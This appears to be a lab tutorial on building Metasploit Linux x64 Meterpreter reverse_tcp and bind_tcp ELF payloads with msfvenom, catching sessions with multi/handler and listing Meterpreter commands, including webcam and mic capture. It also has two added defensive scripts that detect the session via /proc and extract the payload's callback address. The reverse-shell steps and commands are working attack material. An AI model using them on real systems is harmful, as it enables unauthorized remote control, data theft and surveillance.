Environment
Attacker: Kali Linux 2020.1, 172.16.252.129
Target: Ubuntu 16.04, 172.16.252.138
Generating a reverse-connection payload
Use the msfvenom tool that ships with Kali to generate the payload.
List the payloads available for Linux:
msfvenom -l payloads | grep linux
For the 64-bit Ubuntu target, use the linux/x64/meterpreter/reverse_tcp payload, set the IP and port the target should connect back to, and write it out as an ELF executable:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=172.16.252.129 LPORT=1234 -f elf > shell.elf
msfvenom prints:
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
shell.elf now exists in the current directory. The 250 bytes are a 64-byte ELF header, a 56-byte program header and the 130-byte payload. The payload is only a stager: it connects to LHOST:LPORT and reads the real Meterpreter stage from the handler, which is why the file is so small and why the handler later reports "Sending stage".
Starting the listener
Next, run msfconsole:
msfconsole
Enter the following commands to select the generic handler module and set the payload, IP and port:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 172.16.252.129
set lport 1234
exploit
The final exploit can be replaced with run. The payload set here must be exactly the one given to msfvenom (same architecture, same staged/stageless variant, same transport), otherwise the handler cannot complete the session when the target connects.
Running the payload
Make the generated shell.elf executable:
chmod a+x shell.elf
Copy it to the Ubuntu 16.04 target and run it (if the transfer drops the mode bits, for example a download over HTTP, run chmod +x again on the target):
./shell.elf
The Kali side then prints:
[*] Started reverse TCP handler on 172.16.252.129:1234
[*] Sending stage (3021284 bytes) to 172.16.252.138
[*] Meterpreter session 2 opened (172.16.252.129:1234 -> 172.16.252.138:56384) at 2020-04-20 07:04:26 -0400
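Seen from the Ubuntu side, the session has two traces at this point: the stager has mmap'd an anonymous read/write/execute region and read the 3021284-byte stage into it, and the process holds an ESTABLISHED TCP connection to 172.16.252.129:1234. The script below is an added example and not part of the original post. It parses the kernel's /proc/net/tcp and /proc/<pid>/maps text and flags a process that shows both traces at once. The sample lines are constructed to mirror the lab above (pid 4321, the socket inode 40211 and the mapping addresses are made up), and the rwx mapping is an indicator rather than proof, since a later stage may move elsewhere and JIT runtimes create rwx regions legitimately.

```python
#!/usr/bin/env python3
"""Host-side check for a Meterpreter reverse_tcp session on Linux.

Added example, not from the original post. It parses the text formats of
/proc/net/tcp and /proc/<pid>/maps and flags a process that both holds an
ESTABLISHED TCP connection and owns a large anonymous rwx mapping, which is
the footprint the stager leaves after reading the stage into mmap'd memory.
"""
import os
import re
import socket
import struct
import sys

TCP_ESTABLISHED = 0x01


def _decode_addr(field: str):
    """'81FC10AC:04D2' -> ('172.16.252.129', 1234). The kernel prints the IPv4
    address as a host-order hex word, i.e. byte-reversed on x86."""
    ip_hex, port_hex = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def established_connections(proc_net_tcp: str):
    """Return [{'local', 'remote', 'inode'}] for every ESTABLISHED socket."""
    conns = []
    for line in proc_net_tcp.splitlines()[1:]:        # skip the header line
        f = line.split()
        if len(f) < 10 or int(f[3], 16) != TCP_ESTABLISHED:
            continue
        conns.append({"local": _decode_addr(f[1]),
                      "remote": _decode_addr(f[2]),
                      "inode": int(f[9])})
    return conns


def anon_rwx_regions(maps_text: str):
    """Return (start, end, size) for anonymous rwx mappings: inode 0, no
    backing file, and not a pseudo-path such as [stack] or [heap]."""
    regions = []
    for line in maps_text.splitlines():
        f = line.split()
        if len(f) < 5:
            continue
        perms, inode, path = f[1], f[4], (f[5] if len(f) > 5 else "")
        if perms.startswith("rwx") and inode == "0" and not path.startswith("["):
            start, end = (int(x, 16) for x in f[0].split("-"))
            regions.append((start, end, end - start))
    return regions


def suspicious_processes(proc_net_tcp, maps_by_pid, socket_inodes_by_pid,
                         min_rwx=1 << 20):
    """Flag pids with an ESTABLISHED socket and an anonymous rwx mapping of at
    least min_rwx bytes (1 MiB default; the stage in the lab was about 3 MB)."""
    by_inode = {c["inode"]: c for c in established_connections(proc_net_tcp)}
    findings = []
    for pid, maps_text in maps_by_pid.items():
        big = [r for r in anon_rwx_regions(maps_text) if r[2] >= min_rwx]
        socks = [by_inode[i] for i in socket_inodes_by_pid.get(pid, ()) if i in by_inode]
        if big and socks:
            findings.append({"pid": pid, "remote": socks[0]["remote"],
                             "rwx_bytes": max(r[2] for r in big)})
    return findings


def collect_live():
    """Read the real /proc (Linux only; root is needed to see other users' fds)."""
    net = open("/proc/net/tcp").read()
    maps, fds = {}, {}
    for d in filter(str.isdigit, os.listdir("/proc")):
        pid = int(d)
        try:
            maps[pid] = open(f"/proc/{pid}/maps").read()
            fds[pid] = set()
            for fd in os.listdir(f"/proc/{pid}/fd"):
                m = re.fullmatch(r"socket:\[(\d+)\]", os.readlink(f"/proc/{pid}/fd/{fd}"))
                if m:
                    fds[pid].add(int(m.group(1)))
        except OSError:
            continue                                   # process exited or no permission
    return net, maps, fds


# Constructed samples mirroring the lab: target 172.16.252.138 connected to the
# handler 172.16.252.129:1234 from pid 4321 (inode and addresses are made up).
SAMPLE_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18754 1 0000000000000000 100 0 0 10 0
   1: 8AFC10AC:DC40 81FC10AC:04D2 01 00000000:00000000 00:00000000 00000000  1000        0 40211 1 0000000000000000 20 4 30 10 -1
"""
SAMPLE_MAPS = {
    4321: "00400000-00401000 r-xp 00000000 08:01 524290 /tmp/shell.elf\n"
          "7f2c5d000000-7f2c5d2e2000 rwxp 00000000 00:00 0\n"
          "7ffd1a3c0000-7ffd1a3e1000 rw-p 00000000 00:00 0 [stack]\n",
    1234: "00400000-0040b000 r-xp 00000000 08:01 131073 /bin/cat\n"
          "7ffd00000000-7ffd00021000 rw-p 00000000 00:00 0 [stack]\n",
}
SAMPLE_FD_INODES = {4321: {40211}, 1234: set()}

if __name__ == "__main__":
    if "--live" in sys.argv:
        net, maps, fds = collect_live()
    else:
        net, maps, fds = SAMPLE_NET_TCP, SAMPLE_MAPS, SAMPLE_FD_INODES
    for hit in suspicious_processes(net, maps, fds):
        print(hit)
```

Run it without arguments to see the constructed case flagged; run it as root with --live on the Ubuntu target while the session is open to check the real process. The socket-to-process link goes through the inode number: /proc/net/tcp lists the inode, and the owning process has an fd symlink of the form socket:[inode].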
Bind-connection payload
The same procedure works with a bind_tcp payload, which gives a bind (forward) connection instead. The difference between the two:
With a reverse connection the attacker opens a port and the target connects to it;
With a bind connection the target opens a port and the attacker connects to it.
A bind payload therefore needs no LHOST, but the target's port must be reachable from the attacker, so a host firewall or NAT in front of the target blocks it; that is why reverse payloads are usually preferred.
Generate the payload:
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4444 -f elf > bindtcp.elf
Copy it to the target and run it:
./bindtcp.elf
On the attacker, start the handler. For a bind payload it takes RHOST (the target's address) and LPORT (the port the target is listening on):
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 172.16.252.138
set lport 4444
run
The connection is established successfully.
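Before copying either file to the target (or when triaging one found on a compromised host), it is worth confirming that the ELF is really the 64-bit x86 executable msfvenom said it produced and seeing which address it will use. The script below is an added example and not part of the original post; it serves both the reverse_tcp and the bind_tcp payload generated above. It checks the ELF header and then searches the bytes for the sockaddr_in structure embedded in the stager. The byte patterns it looks for are an assumption drawn from the layout of Metasploit's linux/x64 stagers (a mov reg, imm64 holding {AF_INET, port, ip} for reverse_tcp, a mov dword [rsp] holding {AF_INET, port} for bind_tcp) and may not match other versions, encoders or architectures. Because msfvenom is not run here, the two sample files are constructed in code from a bare ELF header plus the first instructions of each stager, with the lab's own addresses.

```python
#!/usr/bin/env python3
"""Sanity-check an msfvenom Linux x64 ELF and recover the listener it will use.

Added example, not from the original post. The stager byte patterns are an
assumption about Metasploit's linux/x64 reverse_tcp / bind_tcp stagers and
may not match other versions, encoders or architectures.
"""
import re
import socket
import struct
import sys

ELF_MAGIC = b"\x7fELF"
EM_X86_64 = 0x3E          # e_machine value for AMD x86-64
ET_EXEC = 2               # e_type value for an executable


def elf_info(data: bytes) -> dict:
    """Parse e_ident, e_type and e_machine of a little-endian ELF64 file."""
    if len(data) < 64 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    if ei_class != 2 or ei_data != 1:
        raise ValueError("expected ELFCLASS64 / little-endian")
    e_type, e_machine = struct.unpack_from("<HH", data, 16)
    return {"type": e_type, "machine": e_machine,
            "ok_for_ubuntu_x64": e_type == ET_EXEC and e_machine == EM_X86_64}


# reverse_tcp stager: mov r64, imm64 (REX.W + opcode B8..BF) whose immediate
# is a sockaddr_in {sin_family=AF_INET(2), sin_port big-endian, sin_addr}.
REVERSE_PAT = re.compile(rb"\x48[\xb8-\xbf]\x02\x00(..)(....)", re.DOTALL)
# bind_tcp stager: mov dword [rsp], {AF_INET, sin_port}; sin_addr stays as the
# zeroed INADDR_ANY already pushed on the stack.
BIND_PAT = re.compile(rb"\xc7\x04\x24\x02\x00(..)", re.DOTALL)


def extract_c2(data: bytes):
    """Return ("reverse_tcp", ip, port), ("bind_tcp", "0.0.0.0", port) or None."""
    m = REVERSE_PAT.search(data)
    if m:
        return ("reverse_tcp", socket.inet_ntoa(m.group(2)),
                struct.unpack(">H", m.group(1))[0])
    m = BIND_PAT.search(data)
    if m:
        return ("bind_tcp", "0.0.0.0", struct.unpack(">H", m.group(1))[0])
    return None


def make_sample(stager: bytes) -> bytes:
    """Constructed stand-in for an msfvenom ELF: a bare 64-byte ELF64 header
    (no program headers, so it is not runnable) followed by stager bytes."""
    e_ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\x00" * 8
    header = e_ident + struct.pack(
        "<HHIQQQIHHHHHH", ET_EXEC, EM_X86_64, 1, 0x400078, 64, 0, 0,
        64, 56, 1, 0, 0, 0)
    return header + stager


# Constructed stager prefixes (socket() followed by the sockaddr setup) using
# the lab's addresses: reverse to 172.16.252.129:1234, bind on 0.0.0.0:4444.
REVERSE_SAMPLE = make_sample(bytes.fromhex(
    "6a2958996a025f6a015e0f054897"       # socket(AF_INET, SOCK_STREAM, 0)
    "48b90200" "04d2" "ac10fc81"         # mov rcx, {AF_INET, 1234, 172.16.252.129}
    "514889e66a105a6a2a580f05"))         # push rcx; connect(fd, rsp, 16)
BIND_SAMPLE = make_sample(bytes.fromhex(
    "6a2958996a025f6a015e0f054897"
    "52c70424" "0200" "115c"             # push rdx; mov dword [rsp], {AF_INET, 4444}
    "4889e66a105a6a31580f05"))           # bind(fd, rsp, 16)


def triage(data: bytes) -> dict:
    """Combine the header check and the C2 extraction for one file."""
    return {**elf_info(data), "c2": extract_c2(data), "size": len(data)}


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else REVERSE_SAMPLE
    print(triage(data))
```

Point it at the real file with python3 triage.py shell.elf; for the payload generated above the expected result is an x86-64 executable whose c2 entry names 172.16.252.129:1234. A mismatch in the machine field means the wrong payload was picked for the target, and a missing c2 entry means the stager layout differs from the assumed one (an encoder was used, or a different Metasploit version), not necessarily that the file is harmless.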
Meterpreter commands
The available Meterpreter commands are listed below (note that there is no screenshot command: it belongs to the Windows Meterpreter's user-interface command set, and the Linux Meterpreter used here exposes only the extensions shown):
meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel

Stdapi: File system Commands
============================

    Command                   Description
    -------                   -----------
    cat                       Read the contents of a file to the screen
    cd                        Change directory
    checksum                  Retrieve the checksum of a file
    chmod                     Change the permissions of a file
    cp                        Copy source to destination
    dir                       List files (alias for ls)
    download                  Download a file or directory
    edit                      Edit a file
    getlwd                    Print local working directory
    getwd                     Print working directory
    lcd                       Change local working directory
    lls                       List local files
    lpwd                      Print local working directory
    ls                        List files
    mkdir                     Make directory
    mv                        Move source to destination
    pwd                       Print working directory
    rm                        Delete the specified file
    rmdir                     Remove directory
    upload                    Upload a file or directory

Stdapi: Networking Commands
===========================

    Command                   Description
    -------                   -----------
    arp                       Display the host ARP cache
    getproxy                  Display the current proxy configuration
    ifconfig                  Display interfaces
    ipconfig                  Display interfaces
    netstat                   Display the network connections
    portfwd                   Forward a local port to a remote service
    resolve                   Resolve a set of host names on the target
    route                     View and modify the routing table

Stdapi: System Commands
=======================

    Command                   Description
    -------                   -----------
    execute                   Execute a command
    getenv                    Get one or more environment variable values
    getpid                    Get the current process identifier
    getuid                    Get the user that the server is running as
    kill                      Terminate a process
    localtime                 Displays the target system's local date and time
    pgrep                     Filter processes by name
    pkill                     Terminate processes by name
    ps                        List running processes
    shell                     Drop into a system command shell
    suspend                   Suspends or resumes a list of processes
    sysinfo                   Gets information about the remote system, such as OS

Stdapi: Webcam Commands
=======================

    Command                   Description
    -------                   -----------
    webcam_chat               Start a video chat
    webcam_list               List webcams
    webcam_snap               Take a snapshot from the specified webcam
    webcam_stream             Play a video stream from the specified webcam

Stdapi: Mic Commands
====================

    Command                   Description
    -------                   -----------
    listen                    listen to a saved audio recording via audio player
    mic_list                  list all microphone interfaces
    mic_start                 start capturing an audio stream from the target mic
    mic_stop                  stop capturing audio

Stdapi: Audio Output Commands
=============================

    Command                   Description
    -------                   -----------
    play                      play an audio file on target system, nothing written on disk
For example, running:
ls
now lists the target host's current directory.